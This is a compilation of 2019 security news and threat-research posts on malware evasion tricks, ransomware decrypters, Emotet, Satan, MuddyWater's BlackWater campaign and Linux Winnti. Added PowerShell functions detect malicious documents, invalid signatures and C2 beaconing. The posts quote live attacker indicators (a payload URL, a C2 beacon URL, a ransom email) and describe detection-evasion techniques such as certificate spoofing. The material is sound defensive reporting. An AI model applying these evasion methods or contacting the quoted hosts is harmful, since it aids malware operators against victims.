One year ago, Cisco Talos first disclosed the existence of VPNFilter on May 23, 2018. The malware made headlines across the globe, as it was a sophisticated piece of malware developed by a nation state, infecting half a million devices, and poised to cause havoc. Yet the attack was averted. This is the story of VPNFilter, and the catastrophe that was averted.


The post One year later: The VPNFilter catastrophe that wasn’t appeared first on Cisco Blog.

Playing Cat and Mouse: Three Techniques Abused to Avoid Detection

The experts at Yoroi-Cybaze Zlab described three techniques commonly implemented by threat actors to avoid detection.


During our analysis we constantly run into the tricks cyber-attackers use to bypass companies’ security defences, some advanced, others not. Many times, despite their elegance (or lack of it), these techniques are effective and actually help cyber criminals get into victim computers and penetrate company networks.

This technical article aims to bring to light details of some of the techniques currently abused by various threat actors, in order to help security operators, industry and companies to mitigate their effects.

Technical Analysis

The following sections describe three cases we recently dissected, highlighting some of the tricks cyber-criminals and threat groups are currently using to avoid detection. The first two are techniques related to Office documents, used to hide malicious payload and lure the users. The third one is related to binary payloads abusing code signature tricks to evade traditional security controls.

The Broken Doc

Threat: cve-2017-0199 document
Brief Description: Document Dropper exploiting cve-2017-0199
Ssdeep: 96:Hd4+dGCbidUEd9IUfPLIuSdFpMcuGg5mLWStWiWrVMd92c SCedL0m03mbRTiqhrr:C+bcyucyMtWNYk0mqQTnhr5OARQT6

Table 1. Sample information

The first trick we dissected employs “voluntary document corruption” to persuade the user to restore the original file, so that the malicious payload is downloaded without any suspicious alert being noticed. As a case study we chose a Word document containing the CVE-2017-0199 exploit, which allows the document to download and execute arbitrary code at opening time. The following figure shows the external reference to the remote code that will be executed: “hxxps://www.protectiadatelor[.biz/js/Oj1/smile.doc”.

Figure 1. External resource in the analyzed document

Normally, opening a weaponized document such as this one will likely alert a trained, aware user: a strange popup window reports the presence of a “link” to external files.

Figure 2. Suspicious popup window

This message could look suspicious to the victim, who could delete the document and avoid the infection. But through the trick we observed, the user warning can be bypassed. The sample contains a careful corruption of the document itself: some bytes have been deleted by the attacker without affecting the behavior of the exploit.

Figure 3. Corrupted document

Once the user opens the crafted file, MS Word displays a different popup: it now reports that the document is corrupted and asks for confirmation to restore it. This is a totally different message from the previous one, and it lets the victim think the document is merely broken.

Figure 4. Popup window reporting the impossibility of opening the document

After the user clicks “Yes”, MS Word automatically restores the file content and starts the exploit, which downloads and executes further payloads.
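A defender-side check for the construct described above, added here as an example and not part of the original analysis: the remote reference of a CVE-2017-0199 document lives in the package's relationship parts as an OLE object relationship whose target is external. The function below opens a document as a ZIP container (assuming the OOXML .docx format; the sample directory and file names are hypothetical) and reports every such relationship. A container that cannot be opened at all is reported separately, because the “broken doc” trick relies on Word silently repairing a damaged file.

```powershell
# Added example (not from the original article): flag Office documents whose
# relationship parts point at external OLE objects, the construct the
# CVE-2017-0199 sample above uses to fetch remote content.
# Assumes an OOXML (.docx) container; paths below are hypothetical.
Add-Type -AssemblyName System.IO.Compression.FileSystem

function Get-ExternalOleReference {
    param([Parameter(Mandatory)][string]$Path)

    $findings = @()
    try {
        $zip = [System.IO.Compression.ZipFile]::OpenRead($Path)
    } catch {
        # Unreadable archive: exactly what a deliberately corrupted document looks like
        return [pscustomobject]@{ File = $Path; Status = 'UnreadableArchive'; Target = $null }
    }
    try {
        # Every *.rels part (word/_rels/document.xml.rels and friends) lists the
        # document's relationships; TargetMode="External" means the target is a URL.
        foreach ($entry in $zip.Entries | Where-Object { $_.FullName -like '*_rels/*.rels' }) {
            try {
                $reader = New-Object System.IO.StreamReader($entry.Open())
                [xml]$rels = $reader.ReadToEnd()
                $reader.Dispose()
            } catch {
                $findings += [pscustomobject]@{ File = $Path; Status = 'CorruptEntry'; Target = $entry.FullName }
                continue
            }
            foreach ($rel in $rels.Relationships.Relationship) {
                if ($rel.TargetMode -eq 'External' -and $rel.Type -like '*/oleObject') {
                    $findings += [pscustomobject]@{ File = $Path; Status = 'ExternalOleObject'; Target = $rel.Target }
                }
            }
        }
    } finally {
        $zip.Dispose()
    }
    if ($findings.Count -eq 0) {
        $findings = ,([pscustomobject]@{ File = $Path; Status = 'Clean'; Target = $null })
    }
    return $findings
}

# Hypothetical quarantine folder; run over every .docx and show what was found.
Get-ChildItem -Path .\samples -Filter *.docx |
    ForEach-Object { Get-ExternalOleReference -Path $_.FullName } |
    Format-Table -AutoSize
```

The check deliberately does not rely on the application's own warning dialogs: the whole point of the corruption trick is that the user never sees the “external link” prompt, so the relationship data in the package is the more reliable signal.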

Hide Payload with Office Developer Mode

Other malicious documents we analyzed employ tricks to hide the real payload in MS Office developer control objects: components that are often not visible to end users. In most Office installations, in fact, the Developer tab is disabled by default, so it is even more difficult to identify the presence of anomalous objects.

This technique was also employed in a sample we analyzed some time ago. At opening time the document looks like many others.

Figure 5. Classic phishing document view

However, the macro code analysis reveals that the real payload is contained elsewhere, in particular in an object named “Kplkaaaaaaaz”.

Figure 6. Part of macro code embedded in the document

This hidden object appears as a tiny text box just after the enabling of macro code (Figure 7).

Figure 7. Document’s modified view

Without enabling Word developer mode, in the appropriate Options menu, it is impossible to select and modify the object’s properties. After enabling it, we were able to explore the object content: the Base64-encoded payload.

Figure 8. Extracted payload

Using this strategy, the malware writer moves the identifiable payload into a section which is more difficult to detect for both automatic and manual analysis, obtaining a lower detection rate during static analysis.

Spoofed Signature

Another interesting technique abused by cyber-criminals in the wild is “certificate spoofing”, which allows malware to easily bypass a relevant portion of anti-virus engines, even those employing identification techniques theoretically able to detect encrypted and packed threats. Indeed, attackers could also obtain a valid certificate for their malware by stealing cryptographic keys from legitimate owners or by leveraging rogue companies, as observed in the signed Email Stealer used by the TA505 hacker group, described in our report.

However, in many cases evading detection requires less effort: even an invalid certificate is enough to achieve the goal, as in a recent Ursnif attack campaign (sample on Yomi Hunter).

Figure 9. Spoofed signature on Ursnif sample

Using certificate spoofing techniques, an attacker may sign an arbitrary executable with an arbitrary certificate taken from any website. As a study case, we reproduced this technique by signing a known Emotet binary with the Symantec website certificate.

Brief Description: Emotet payload
Ssdeep: 1536:X6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX7CLNiu:X6ho6yuxU8Dhc++uD32azXGLN

Table 2. Sample information

Brief Description: Emotet payload signed using Symantec cert
Ssdeep: 1536:U6fyfENGX6yu5XLyR2zrcPSDILuhJiI9+F04OLD2DjalDxX7CLNiuexK3hJw:U6ho6yuxU8Dhc++uD32azXGLNuIw

Table 3. Sample information

Figure 10. Comparison between samples without and with fake certificate

As confirmed by the Microsoft SignTool utility, the file signature is invalid, as expected.

Figure 11. SignTool check reporting the certificate was invalid

However, this trick led to a decrease in the VirusTotal detection rate from 36 to 20. Even Symantec AV didn’t detect the sample as malicious!

For the sake of correctness, as Chronicle Security states, VirusTotal is not a “comparative metric between different antivirus products”, so this result does not imply anything about the overall quality of the antivirus solutions. Conservatively, it provides a clue about one inner detection mechanism, showing how attackers bypass some identification logic, not the whole AV solution.

Figure 12. Detection rate decrease thanks to certificate addition

The low-level diff analysis between the two samples confirms that the certificate addition does not impact in any way the functional parts of the malware and, therefore, its behavior.

Figure 13. Comparison between samples without and with fake certificate at hex level
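The practical lesson of this section is that the presence of a signature block says nothing about its validity, which is what SignTool confirmed above. The following function, added here as an example rather than taken from the article, uses the built-in Get-AuthenticodeSignature cmdlet to list every PE file under a directory whose signature status is anything other than Valid, together with the subject the attached certificate claims. The sample directory path is hypothetical.

```powershell
# Added example (not from the original article): a signature appended to a
# binary is only worth something if the status comes back 'Valid'. Anything
# else (NotSigned, HashMismatch, NotTrusted, UnknownError, ...) deserves a look.
# The directory path is hypothetical.
function Get-SuspectSignature {
    param([Parameter(Mandatory)][string]$Directory)

    Get-ChildItem -Path $Directory -Recurse -Include *.exe, *.dll | ForEach-Object {
        $sig = Get-AuthenticodeSignature -FilePath $_.FullName
        [pscustomobject]@{
            File    = $_.FullName
            Status  = $sig.Status
            # The subject is what the certificate *claims*; it is only meaningful
            # when Status is Valid, otherwise it is just a string the attacker chose.
            Subject = if ($sig.SignerCertificate) { $sig.SignerCertificate.Subject } else { $null }
        }
    } | Where-Object { $_.Status -ne 'Valid' }
}

Get-SuspectSignature -Directory 'C:\samples' | Format-Table -AutoSize
```

A binary carrying a certificate that was never used to actually sign it, as in the Emotet experiment above, will not come back as Valid, so a detection rule that keys on the mere existence of a signer name (or on a reassuring-looking subject) is the kind of logic this trick defeats.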


The techniques shown are only a part of the countless expedients implemented by threat actors to make detection harder. We constantly observe attack attempts using these kinds of tricks, and we are still surprised to see how, nowadays, they can frequently decrease the detection rate even though the tricks are well known.

We hope that a direct spotlight on a few of these tricks will push the eternal cat-and-mouse game between security players and cyber-criminals a bit further, raising the bar and the costs for malicious attackers who are threatening users and companies.

Further technical details, including IoCs and Yara rules, are reported in the original analysis published on the Yoroi blog:

If you appreciate my effort in spreading cybersecurity awareness, please vote for Security Affairs in the section “Your Vote for the Best EU Security Tweeter”

Thank you

Pierluigi Paganini

(SecurityAffairs – malware, avoid detection)

The post Playing Cat and Mouse: Three Techniques Abused to Avoid Detection appeared first on Security Affairs.

Cybercriminals continue to evolve the sophistication of their attack methods

Cybercriminals continue to evolve the sophistication of their attack methods, from tailored ransomware and custom coding for some attacks, to living-off-the-land (LoTL) or sharing infrastructure to maximize their opportunities, according to Fortinet’s latest report.

Pre- and post-compromise traffic

Research to see if threat actors carry out phases of their attacks on different days of the week demonstrates that cybercriminals are always looking to maximize opportunity to their benefit. When comparing Web filtering volume for … More

The post Cybercriminals continue to evolve the sophistication of their attack methods appeared first on Help Net Security.

Emsisoft released a free Decrypter for the GetCrypt ransomware

For the second time in a few days, experts at Emsisoft have released a free decrypter, this time to help victims of the GetCrypt ransomware.

Security experts at Emsisoft released a new decrypter within a few days of the previous one; it can be used for free by victims of the GetCrypt ransomware to decrypt the files encrypted by the malware.

The GetCrypt ransomware is served through the RIG exploit kit, and it leverages Salsa20 and RSA-4096 to encrypt the victims’ files.

“GetCrypt is a ransomware spread by the RIG exploit kit, and encrypts victim’s files using Salsa20 and RSA-4096. It appends a random 4-character extension to files that is unique to the victim.” reads the post published by Emsisoft.

The ransomware drops on the infected systems the file “# DECRYPT MY FILES #.txt” containing the following ransom note:

“Attention! Your computer has been attacked by virus-encoder! All your files are now encrypted using cryptographycalli strong aslgorithm. Without the original key recovery is impossible.

TO GET YOUR DECODER AND THE ORIGINAL KEY TO DECRYPT YOUR FILES YOU NEED TO EMAIL US AT: GETCRYPT@COCK.LI It is in your interest to respond as soon as possible to ensure the restoration of your files. P.S only in case you do not recive a response from the first email address within 48 hours, [redacted]. It is in your interest to respond as soon as possible to ensure the restoration of your files. 


Victims can download the decrypter for free at the following URL:

In order to decrypt the files, victims have to provide an encrypted version of a file and the original of the same file.


A few days ago, Emsisoft released a free Decrypter for JSWorm 2.0.


Pierluigi Paganini

(SecurityAffairs – GetCrypt ransomware, cybercrime)

The post Emsisoft released a free Decrypter for the GetCrypt ransomware appeared first on Security Affairs.

Automated Malware Analysis in the Cloud: An Introduction

Cybercriminals execute malware attacks using different attack vectors and different methods. The number of malware strains is increasing at an unprecedented rate, and hence malware analysis today is not an easy job. In the present context, automated malware analysis is a necessity. Let’s discuss the different aspects of automated malware analysis in the cloud.

Though there are millions of malware samples being distributed around the world today, only a few are new ones. The majority of the malware we find consists of simple derivations of existing, known malware. New malware samples could prove too complex for analysis using cloud automated malware services: by detecting a sandbox, debugger or virtual environment, new, complex malware could recognize the automated analysis environment and then execute different code than it would on a real host.

Well, let’s come back to automated malware analysis in the cloud. There are many automated malware analysis services available on the internet, some of which are free. There are malware analysis tools provided by Comodo, Malwr, Anubis, Hybrid Analysis, Threat Expert, Threat Track, etc. A notable point is that, despite such services automating malware analysis to a great extent, the analyst needs a deep understanding of what he is doing and what he is looking for. This helps him understand the output provided by the malware analysis service.

Let’s now discuss the analysis process.

We should begin by attempting to determine whether the binary sample is malicious. This can be done by using VirusTotal. Note that if the binary sample is quite new, there is a chance that it will not be detected as malicious even if it is, especially if antivirus companies haven’t updated their signatures yet. If the sample is detected as malicious, we get a list of the antivirus solutions that have detected it, plus the name of the malware and details regarding when the signature was last updated. We should next try to get more information about the analyzed malicious file, especially as to what it does.

Cloud automated malware analysis solutions can help gain information about a binary sample that has been detected as malicious. An analysis of the malware on such a tool could yield a detailed report (mostly in HTML, PDF, XML, etc.); this report might contain many details, including the DLLs used by the malware sample, a summary of files and directories accessed by the binary sample, a list of all strings in the binary, details regarding whether it connects back to a C&C server to fetch and execute commands, data pertaining to whether the binary sample modifies certain registry keys to achieve persistence on the infected system, etc.

Thus, by going for automated malware analysis, we can detect malware and gain sufficient information about malicious files, which would help us combat them in better and more effective ways.

At the same time, let’s remember that there are instances when the results yielded by such an analysis turn out to be false positives. This lack of 100 percent accuracy makes manual analysis inevitable as well. Anyhow, researchers are striving to develop better automated malware analysis tools with improved features that could help solve such issues, at least to a great extent.

Related Resources:

Static Malware Analysis Vs Dynamic Malware Analysis

The Fileless Malware Attacks Are Here To Stay

The post Automated Malware Analysis in the Cloud: An Introduction appeared first on .

The Satan Ransomware adds new exploits to its arsenal

A recently observed variant of the Satan ransomware adds new exploits to its arsenal and targets machines by leveraging additional flaws.

Experts at FortiGuard Labs have discovered a new variant of the Satan ransomware that adds new exploits to its portfolio and leverages additional vulnerabilities to infect as many machines as possible.

The Satan ransomware first appeared in the threat landscape in January 2017, when the independent malware researcher @Xylit0l discovered it. The ransomware belongs to the Gen:Trojan.Heur2.FU family and was offered as a RaaS (Ransomware-as-a-Service).

The Satan ransomware uses RSA-2048 and AES-256 cryptography and appends the “.stn” extension to the names of encrypted files.


Since its discovery, the malware has been constantly updated; in one of the campaigns monitored by Fortinet, it utilized a cryptominer as an additional payload to maximize its profits.

The Satan ransomware targets both Linux and Windows machines, and it attempts to exploit a large number of vulnerabilities to propagate itself through private and public networks.

The initial spreader can propagate via both private and public networks. No specific changes were made to the Windows component, which still leverages the NSA EternalBlue exploit. In order to target public IPs, the spreader retrieves the list of targets from the C2 server and iterates through all of them. All the attacks observed by Fortinet originated from IP addresses located in China.

“Its initial spreader, conn.exe on Windows and conn32/64 on Linux, is capable of propagating through both private and public networks. In older campaigns, its Linux component (conn32/64) only propagates through non-Class A type private networks. However, it has recently been updated and now supports both private and public network propagation.” reads the analysis published by Fortinet. “For the Windows component (conn.exe), nothing much has really changed, and it even still carries the EternalBlue exploit (from the NSA) and the open-source application Mimikatz.”

The Satan ransomware attempts to exploit a long list of known vulnerabilities, including the JBoss default configuration vulnerability (CVE-2010-0738), Tomcat arbitrary file upload vulnerability (CVE-2017-12615), WebLogic arbitrary file upload vulnerability (CVE-2018-2894), WebLogic WLS component vulnerability (CVE-2017-10271), Windows SMB remote code execution vulnerability (MS17-010), and Spring Data Commons remote code execution vulnerability (CVE-2018-1273).

Both the recent Windows and Linux variants observed by the experts include several web application remote code execution exploits. Below is the list of new vulnerabilities targeted by the recently discovered variant.

The propagation method performs IP address traversal and attempts to scan and execute its entire list of exploits on every IP address encountered, along with the corresponding hardcoded port list.

“It performs IP address traversal and attempts to scan and execute its entire list of exploits on every IP address encountered, along with its corresponding hardcoded port list that is described below.” continues the analysis. “To be more efficient, it implements multi-threading, in which separate threads are spawned for every propagation attempt for every targeted IP and port. “

Experts also observed that the Satan ransomware scans for some applications, including Drupal, XML-RPC and Adobe, and notifies the server if an application exists, likely for statistical purposes.

“Satan Ransomware is becoming more and more aggressive with its spreading. By expanding the number of vulnerable web services and applications it targets, it increases its chance of finding another victim and generating more profits.” Fortinet concludes. “In addition, Satan Ransomware has also already adopted the Ransomware-as-a-Service scheme, opening it up to use by more threat actors, which means more attacks and more revenue,”


Pierluigi Paganini

(SecurityAffairs – Satan Ransomware, malware)

The post The Satan Ransomware adds new exploits to its arsenal appeared first on Security Affairs.

Emsisoft released a free Decrypter for JSWorm 2.0

Good news for the victims of the JSWorm 2.0 ransomware: thanks to experts at Emsisoft they can decrypt their files for free.

Experts at the Emsisoft malware research team released a decrypter for a recently discovered ransomware tracked as JSWorm 2.0.

JSWorm 2.0 is written in C++ and implements Blowfish encryption. The first version of the malware was written in C# and used the “.JSWORM” extension. Researchers believe both versions were developed by the same author.

Researchers found notable callouts in two different malware samples naming ID Ransomware and several prominent malware researchers:
Experts pointed out that there have been multiple confirmed submissions to the online service ID Ransomware, which allows victims to upload their encrypted files to identify the ransomware that infected their machines. Since January 2019, experts have observed encrypted files uploaded from South Africa, Italy, France, Iran, Vietnam, Argentina, the United States, and other countries.

“Its files have the “.[ID-<numbers>][<email>].JSWORM” extension and the ransom note file named “JSWORM-DECRYPT.txt.”” reads the post published by Emsisoft.

Once it has infected a computer, the JSWorm 2.0 ransomware performs the following actions:

  • Sets the “EnableLinkedConnections” registry key, which allows it to attack mapped drives when ran as admin.
  • Restarts SMB services (lanmanworkstation) to take effect (we are investigating if there’s more to the SMB vector).
  • Stops services for databases (MSSQL, MySQL, QuickBooks), kills shadow copies, disables recovery mode.

Victims of the JSWorm ransomware have to follow the instructions below to decrypt their files for free:

  1. Download the Emsisoft JSWorm 2.0 Decrypter.
  2. Run the executable and confirm the license agreement when asked.
  3. Click “Browse” and select the ransom note file on your computer.
  4. Click “Start” to decrypt your files. Note that this may take a while.



Pierluigi Paganini

(SecurityAffairs – JSWorm 2.0. ransomware)

The post Emsisoft released a free Decrypter for JSWorm 2.0 appeared first on Security Affairs.

What is Emotet?


Emotet malware was first identified in 2014 as a banking trojan. Since then, Emotet has evolved from a banking trojan into a threat distributor. It hit many organizations very badly in 2018 with its spamming and spreading functionalities. With its widespread presence at many organizations, it became a threat distributor. Since mid-2018, Emotet has been used by threat actors to spread other malware like TrickBot, Qakbot and, most dangerous of all, the Ryuk ransomware. It has also been observed that it loads modules and launches different malware depending on geographical location, i.e. the country of the victim.

The malware authors’ strategy is to use infected systems for every possible purpose: first for credential stealing, then using these credentials for spreading and spamming. Finally, when all use of the infected system is done, it deploys other malware like ransomware, TrickBot, Qakbot.

Since mid-2018, Emotet has become a headache for security providers because of its polymorphic, self-updating and spreading capabilities, which make cleaning an infected network very complex and sometimes take months.

How can it enter your system?

It enters your system through a phishing mail, as shown in the figure below:

Such emails contain malicious attachments like doc, pdf, xls, js, etc. Once the user opens such an attachment, it downloads and launches Emotet. Sometimes such mail may contain malicious links which, when opened by users, download and launch Emotet. The other way is lateral spreading: if one of your friends or colleagues on the same network is infected with Emotet, then your friend’s machine can deploy Emotet on your machine.

What can Emotet do?

It has many capabilities, like password stealing, email harvesting, spamming, lateral spreading and launching other malware. All of these are discussed in detail in our research paper on Emotet.


According to US-CERT alert released on July 20, 2018, “Emotet continues to be amongst the most costly and destructive malware affecting state, local, tribal, and territorial (SLTT) governments, and the private and public sectors. Emotet infections have cost SLTT governments up to $1 million per incident to remediate.”

At Quick Heal Labs, we have seen many of our customers badly affected by the spamming done by Emotet. As the malware sends many phishing mails to the user’s contacts, the mail server reaches its maximum limits and blocks the user’s account for the day. As a result, most of the employees of such an infected organization cannot send mail. Such blockages lead to disruption of regular operations or work, and further potential harm to the organization’s reputation. Finally, after a week or two we were able to clean the whole network completely.

A Ryuk ransomware infection may cause temporary or permanent loss of the user’s critical data.

What Quick Heal’s telemetry says:

As you can see, the number of hits per day has been very high from July 2018 till April 2019. It indicates how widespread it is. But the same is not the case with the actual number of customer escalations. At Quick Heal Labs, even while detecting thousands of samples per day, we received many customer escalations in the initial months after the outbreak. We then added rules, IOCs and signatures at each level of the product’s features, namely Virus Protection, Behavior Detection, Email Protection, Memory Scan, IDS & IPS, machine learning based detection and Browsing Protection. This directly resulted in zero customer escalations for Emotet over the last few months, with already infected customers also totally cleaned. The stats indicate that we have been detecting thousands of Emotet samples per day in the last few months and still no customer escalation/issue has been reported.

How can I remove Emotet?

If your machine is on the network of an organization, first isolate it immediately. Patch all installed software with the latest updates and clean the system.

As Emotet can move laterally within a network, your machine can be infected again when you reconnect to the network. Identify and clean each infected machine on the same network. It is a really complex process to follow. One can always choose Quick Heal Antivirus / Seqrite Endpoint Security to avoid this complex process and stay safe, with cleaning of already infected machines and proactive blocking of future Emotet infections.

Preventive measures

  1. Keep your computer up-to-date with the latest updates of Operating system, Security software and other software.
  2. Don’t open any link in the mail received from an unknown/untrusted source.
  3. Don’t download attachments received by an unknown/untrusted source.
  4. Don’t enable ‘macros’ in Microsoft Office documents.
  5. Educate yourself and others about keeping strong passwords.
  6. Use two-factor authentication wherever possible.


Stats indicate that we have been detecting thousands of Emotet samples per day in the last few months and still no customer escalation/issue has been reported. With this we can say that Quick Heal is able to stop Emotet as of today. As it is always a cat-and-mouse game between malware and security vendors, we expect Emotet to evolve to its next step. We will keep monitoring Emotet in the future and will ensure all customers are secured from such malware.

To read more about the detailed analysis of the Emotet, download this PDF.

The post What is Emotet? appeared first on Seqrite Blog.

MuddyWater BlackWater campaign used new anti-detection techniques

A recent MuddyWater campaign tracked as BlackWater shows that the APT group added new anti-detection techniques to its arsenal.

Security experts at Cisco Talos attributed the recently spotted campaign tracked as “BlackWater” to the MuddyWater APT group (aka SeedWorm and TEMP.Zagros). 

The researchers also pointed out that the cyber espionage group has been updating its tactics, techniques, and procedures (TTPs) by adding three distinct steps to its operations to avoid detection.

The first MuddyWater campaign was observed in late 2017, when it targeted entities in the Middle East.

The experts called the campaign ‘MuddyWater’ due to the confusion in attributing a wave of attacks that took place between February and October 2017, targeting entities in Saudi Arabia, Iraq, Israel, the United Arab Emirates, Georgia, India, Pakistan, Turkey, and the United States.

The group evolved over the years by adding new attack techniques to its arsenal.

In March 2018, experts at FireEye uncovered a massive phishing campaign conducted by the TEMP.Zagros group targeting Asia and Middle East regions from January 2018 to March 2018.

Attackers used weaponized documents typically having geopolitical themes, such as documents purporting to be from the National Assembly of Pakistan or the Institute for Development and Research in Banking Technology.

In June 2018, Trend Micro researchers discovered a new attack relying on weaponized Word documents and PowerShell scripts that appears related to the MuddyWater APT. The final payload delivered in the campaign was the PRB-Backdoor RAT, controlled by the command and control (C&C) server at outl00k[.]net.

This campaign aims at installing a PowerShell-based backdoor onto the victim’s machine for espionage purposes.


As part of the recent BlackWater campaign, the MuddyWater APT group leveraged an obfuscated Visual Basic for Applications (VBA) macro script to add a Run registry key and gain persistence.

Then the attackers used a PowerShell stager script, masquerading as a red-teaming tool, that would download a PowerShell-based Trojan from a C2 server.

The stager downloads from the C2 a component of the FruityC2 agent script, an open-source framework on GitHub, which is used to enumerate the host machine.

“This could allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a request to their server in an attempt to investigate the activity.” reads the analysis published by Talos group. “Once the enumeration commands would run, the agent would communicate with a different C2 and send back the data in the URL field. This would make host-based detection more difficult, as an easily identifiable “errors.txt” file would not be generated.”

The cyberspies also replaced some variable strings in the more recent samples to avoid signature-based detection by Yara rules.

Attackers used a document that, once opened, prompted the user to enable a macro titled “BlackWater.bas”. They protected the macro with a password to prevent the user from viewing it in Visual Basic. The “Blackwater.bas” macro was obfuscated using a substitution cipher whereby each character is replaced by its corresponding integer.

“This series of commands first sent a server hello message to the C2, followed by a subsequent hello message every 300 seconds. An example of this beacon is “hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater”.” continues the analysis. “Notably, the trojanized document’s macro was also called “BlackWater,” and the value “BlackWater” was hard coded into the PowerShell script. Next, the script would enumerate the victim’s machine”

Experts conclude that even if the changes implemented by the threat actor were minimal, they were significant enough to avoid detection and to allow the group to continue its operations.
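The beacon described above (a “hello” every 300 seconds to the same URL with the same marker parameter) is exactly the kind of pattern that survives string substitution in the script, because the timing is a property of the behaviour rather than of the code. The function below, added here as an example and not part of the Talos or Security Affairs write-ups, reads proxy-style log lines and reports client/URL pairs that are requested at a near-constant interval. The log lines are constructed for the demonstration, their format is an assumption, and the interval and tolerance parameters are illustrative defaults; the beacon URL repeats the one quoted in the article.

```powershell
# Added example (not from the original article): find fixed-interval beacons
# in proxy logs. Log format here is constructed: "<ISO timestamp> <client> <method> <url>".
function Find-PeriodicBeacon {
    param(
        [Parameter(Mandatory)][string[]]$LogLines,
        [int]$ExpectedSeconds  = 300,   # the 300 s hello interval described by Talos
        [int]$ToleranceSeconds = 5,     # assumed jitter allowance
        [int]$MinimumHits      = 3      # need at least two gaps to call it periodic
    )

    $parsed = foreach ($line in $LogLines) {
        $parts = $line -split ' ', 4
        [pscustomobject]@{
            Time   = [datetime]::Parse($parts[0], [cultureinfo]::InvariantCulture)
            Client = $parts[1]
            Url    = $parts[3]
        }
    }

    # Group by client and full URL (query string included, since the beacon keeps
    # its rCecms= marker on every request), then check the spacing of the hits.
    $parsed | Group-Object Client, Url | ForEach-Object {
        $times = $_.Group.Time | Sort-Object
        if ($times.Count -lt $MinimumHits) { return }
        $gaps = for ($i = 1; $i -lt $times.Count; $i++) { ($times[$i] - $times[$i - 1]).TotalSeconds }
        $regular = @($gaps | Where-Object { [math]::Abs($_ - $ExpectedSeconds) -le $ToleranceSeconds }).Count
        if ($regular -eq $gaps.Count) {
            [pscustomobject]@{
                Client   = $_.Group[0].Client
                Url      = $_.Group[0].Url
                Hits     = $times.Count
                Interval = $ExpectedSeconds
            }
        }
    }
}

# Constructed sample log: one host beaconing every ~300 s, mixed with ordinary browsing.
$sampleLog = @(
    '2019-05-20T10:00:00Z 10.1.2.3 GET http://82.102.8.101/bcerrxy.php?rCecms=BlackWater',
    '2019-05-20T10:01:17Z 10.1.2.3 GET http://example.test/index.html',
    '2019-05-20T10:05:00Z 10.1.2.3 GET http://82.102.8.101/bcerrxy.php?rCecms=BlackWater',
    '2019-05-20T10:10:01Z 10.1.2.3 GET http://82.102.8.101/bcerrxy.php?rCecms=BlackWater',
    '2019-05-20T10:14:59Z 10.1.2.3 GET http://82.102.8.101/bcerrxy.php?rCecms=BlackWater',
    '2019-05-20T10:20:00Z 10.1.2.3 GET http://82.102.8.101/bcerrxy.php?rCecms=BlackWater',
    '2019-05-20T10:03:00Z 10.1.2.9 GET http://example.test/news',
    '2019-05-20T10:08:00Z 10.1.2.9 GET http://example.test/news'
)

# Only the 10.1.2.3 -> bcerrxy.php series is reported: five hits, gaps of 300/301/298/301 s.
Find-PeriodicBeacon -LogLines $sampleLog | Format-Table -AutoSize
```

Grouping on the full URL is deliberate: the article notes that the marker value “BlackWater” was hard-coded into the script, so it repeats on every beacon; a looser grouping (host only) would also work for variants that rotate the path, at the cost of more false positives from ordinary polling traffic.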


Pierluigi Paganini

(SecurityAffairs – MuddyWater, APT)

The post MuddyWater BlackWater campaign used new anti-detection techniques appeared first on Security Affairs.

Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques

This blog was authored by Danny Adamitis, David Maynor, and Kendall McKay

Executive summary

Cisco Talos assesses with moderate confidence that a campaign we recently discovered called “BlackWater” is associated with suspected persistent threat actor MuddyWater. Newly associated samples from April 2019 indicate attackers have added three distinct steps to their operations, allowing them to bypass certain security controls and suggesting that MuddyWater’s tactics, techniques and procedures (TTPs) have evolved to evade detection. If successful, this campaign would install a PowerShell-based backdoor onto the victim’s machine, giving the threat actors remote access. While this activity indicates the threat actor is taking steps to improve its operational security and avoid endpoint detection, the underlying code remains unchanged. The findings outlined in this blog should help threat hunting teams identify MuddyWater’s latest TTPs.


The post Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques appeared first on Cisco Blog.

Chronicle experts spotted a Linux variant of the Winnti backdoor

Security researchers from Chronicle, Alphabet’s cyber-security division, have spotted a Linux variant of the Winnti backdoor.

Security experts from Chronicle, Alphabet’s cyber-security division, have discovered a Linux variant of the Winnti backdoor. It is the first time that researchers have found a Linux version of the backdoor used by the China-linked APT groups tracked as Winnti.


The experts believe that under the Winnti umbrella there are several APT groups, including Winnti, Gref, PlayfullDragon, APT17, DeputyDog, Axiom, BARIUM, LEAD, PassCV, Wicked Panda, and ShadowPad. The groups show similar tactics, techniques, and procedures (TTPs) and in some cases share portions of the same hacking infrastructure.

Chronicle researchers made the discovery while investigating the cyber attack that hit the Bayer pharmaceutical company in April.

Searching for samples of Winnti malware on its VirusTotal platform, the experts discovered a Linux variant of Winnti, dating back to 2015. At the time the malware was used in the hack of a Vietnamese gaming company.

“In April 2019, reports emerged of an intrusion involving Winnti malware at a German Pharmaceutical company.” reads the analysis published by Chronicle. “Analysis of these larger convoluted clusters is ongoing. While reviewing a 2015 report of a Winnti intrusion at a Vietnamese gaming company, we identified a small cluster of Winnti samples designed specifically for Linux.”

The technical analysis of the Linux version of Winnti backdoor revealed the presence of two files, the main backdoor (libxselinux) and a library ( used to avoid the detection.

The Winnti backdoor has a modular structure and implements distinct functionalities using plugins. During the analysis, the researchers were unable to recover any active plugins. Experts believe the attackers used additional Linux modules to implement plugins for remote command execution, file exfiltration, and SOCKS5 proxying on the infected host.

Further analysis revealed many code similarities between the Linux version of the Winnti variant and the Winnti 2.0 Windows version.

“The decoded configuration is similar in structure to the version Kaspersky classifies as Winnti 2.0, as well as samples in the 2015 Novetta report.” continues the report. “Embedded in this sample’s configuration are three command-and-control server addresses and two additional strings we believe to be campaign designators. In Winnti ver. 1, these values were designated as ‘tag’ and ‘group’.”

Like the Windows variants of the Winnti backdoor, the Linux version handles outbound communications using multiple protocols, including ICMP and HTTP as well as custom TCP and UDP protocols.

The Linux version also implements another feature that allows threat actors to initiate connections to infected hosts without requiring a connection to a control server.

The feature could allow attackers to directly access infected systems when access to the hard-coded control servers is disrupted.

“This secondary communication channel may be used by operators when access to the hard-coded control servers is disrupted. Additionally, the operators could leverage this feature when infecting internet-facing devices in a targeted organization to allow them to reenter a network if evicted from internal hosts.” continues the report. “This passive implant approach to network persistence has been previously observed with threat actors like Project Sauron and the Lamberts.”

In 2016, the Winnti hackers also hit the German heavy industry giant ThyssenKrupp to steal company secrets.

